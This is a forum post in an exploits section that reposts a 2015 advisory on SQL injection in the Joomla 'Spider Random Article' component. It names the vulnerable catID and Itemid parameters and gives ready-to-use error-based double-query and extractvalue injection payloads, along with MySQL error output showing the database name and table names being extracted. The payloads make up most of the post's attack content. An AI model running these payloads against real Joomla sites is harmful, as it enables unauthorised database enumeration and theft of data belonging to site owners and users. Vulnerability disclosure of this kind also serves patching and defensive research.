Jump to content
KhiZaRix

Joomla Spider Random Article SQL Injection

By KhiZaRix, in Exploituri

Recommended Posts

KhiZaRix Newbie

KhiZaRix

Posted
Posted

##################################################################################################

#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability

#Author : Jagriti Sahu AKA Incredible

#Vendor Link : Joomla Random Article Demo-Web Dorado

#Date : 22/03/2015

#Discovered at : IndiShell Lab

#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^

##################################################################################################

////////////////////////

/// Overview:

////////////////////////

joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters

and hence affected by SQL injection vulnerability

///////////////////////////////

// Vulnerability Description:

///////////////////////////////

vulnerability is due to catID and Itemid parameter

////////////////

/// POC ////

///////////////

SQL Injection in catID parameter

=================================

Use error based double query injection with catID parameter

Injected Link--->

Joomla Form Maker Demo-Web-Dorado

Like error based double query injection for exploiting username --->

Error: 500 View not found [name, type, prefix]: randomarticle, html, randomarticleView' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13

POC Image URL--->

Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting

SQL Injection in Itemid parameter

=================================

Itemid Parameter is exploitable using xpath injection

Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '***%' OR items='all'' at line 1 SQL=SELECT * FROM vmvxw_spiderfacebook_params WHERE items LIKE '%***13' extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -

POC Image URL--->

http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU

###################################################################################################

--==[[special Thanks to]]==--

# Manish Kishan Tanwar ^_^ #

Source: http://dl.packetstormsecurity.net/1503-exploits/joomlasrac-sql.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...